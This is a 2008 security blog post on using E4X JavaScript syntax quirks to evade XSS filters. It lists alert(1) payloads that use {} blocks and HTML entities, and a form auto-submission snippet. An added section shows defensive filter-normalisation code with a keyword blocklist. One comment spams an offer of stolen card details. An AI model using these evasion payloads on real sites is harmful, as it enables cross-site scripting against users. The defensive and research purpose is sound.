E4X for hackers
Sunday, 7 September 2008
If you’ve not been following my sla.ckers thread on unusual javascript then you’re missing out. My idea was to gather interesting, weird and wonderful javascript tricks which are useful for filter evasion and coding. I investigated E4X quite a lot for this purpose and found a few cool things that I’ll share with you.
Using {} for keyword evasion
Let’s say a filter disallows certain words. Because {} lets you execute a javascript block inside an E4X literal, a block that evaluates to a blank string can be used for keyword evasion. The new Array constructor creates an empty array, which becomes a blank string when used in concatenation.
location=<>javascr{new Array}ipt:aler{new Array}t(1)</>
Another example:-
location=<>javascr{[]}ipt:aler{[]}t(1)</>
A few more:-
<>{new String}</>;
<>{''}</>;
<>{new RegExp()[-1]}</>;
<>{<></>}</>;
Weird syntax fun
E4X also has some syntax quirks that would normally cause a javascript parsing error but are perfectly valid.
default xml namespace = alert(1)
Some more weird looking stuff:-
<>{eval(/alert(1)/[-1])}</>..@*::xyz
(!1..@*::abc?alert:1..@*::xyz)(1)
Numbers as E4X
For some reason, numbers can be used as XML:
1..@Numbers/(are=1)%1..*::xml
Encoding with entities
Giorgio brought this to my attention when he was hacking my unsuccessful Firefox sandbox experiment. You can use html entities, and they will be decoded when the XML data is used as a string.
alert(<>&quot;</>)
A more interesting example with decimal entities:-
eval(<>&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;</>+[])
Hackvertor supports morphs which allow you to generate this sort of data automatically, useful for fuzzing XSS filters (see the E4X morph).
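As an added example (my own code, not from the original post or from Hackvertor), this shows why a plain substring blocklist misses the {} and entity tricks above, and a normalising pre-pass that closes both gaps before the blocklist is applied. BLOCKED, naiveFilter, hardenedFilter and the sample inputs are constructions of mine.

```javascript
// Words a naive XSS filter might blocklist (assumed list for this example).
const BLOCKED = ['javascript:', 'alert'];

// Naive filter: substring match on the raw input, case-insensitive.
function naiveFilter(input) {
  const s = input.toLowerCase();
  return BLOCKED.some(w => s.includes(w));
}

// E4X evaluates {...} inside an XML literal; the post shows blocks that
// yield a blank string (new Array, [], new String, '', <></>). For matching
// purposes we drop every {...} block, since the attacker chooses its contents.
// The loop handles nesting such as {<>{[]}</>}.
function stripBraces(s) {
  let prev;
  do { prev = s; s = s.replace(/\{[^{}]*\}/g, ''); } while (s !== prev);
  return s;
}

// Decode the named and numeric HTML entities that E4X resolves in text content.
const NAMED = { quot: '"', amp: '&', lt: '<', gt: '>', apos: "'" };
function decodeEntities(s) {
  return s.replace(/&(#x[0-9a-f]+|#\d+|[a-z]+);/gi, (m, body) => {
    if (body[0] === '#') {
      const hex = body[1].toLowerCase() === 'x';
      const cp = hex ? parseInt(body.slice(2), 16) : parseInt(body.slice(1), 10);
      return String.fromCodePoint(cp);
    }
    const k = body.toLowerCase();
    return k in NAMED ? NAMED[k] : m;
  });
}

// Normalise first (strip {} blocks, decode entities, lowercase), then match.
function normalise(input) {
  return decodeEntities(stripBraces(input)).toLowerCase();
}
function hardenedFilter(input) {
  return BLOCKED.some(w => normalise(input).includes(w));
}

// Constructed samples modelled on the tricks described in the post.
const SAMPLES = [
  'location=<>javascr{new Array}ipt:aler{[]}t(1)</>',
  'eval(<>&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;</>+[])',
  '<>{<>{[]}</>}</>',
];
```

Running naiveFilter over SAMPLES returns false for every entry, while hardenedFilter flags the first two.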
Form creation
Making forms with E4X is lovely; check it out:-
f=<form/>;
f.@id='x';
f.@action='url.php';
f.@method='post';
f.input.@name='h';
f.input.@value=1;
document.body.innerHTML=f;
document.getElementById('x').submit();
No. 1 — October 8th, 2008 at 2:01 pm
I saw your site and am wondering if you $ crcd details, I got PayPal, let me know
No. 2 — October 8th, 2008 at 3:31 pm
@mark
What are you talking about? Never mind, I’m not interested.
No. 3 — January 8th, 2009 at 5:32 pm
Hi Gareth Heyes,
I just want to know how to test or use these weird vectors.
Thanks!
No. 4 — January 8th, 2009 at 6:04 pm
@Nonove
I’ll be releasing a javascript hacking video shortly
No. 5 — January 8th, 2009 at 7:29 pm
Thanks Heyes!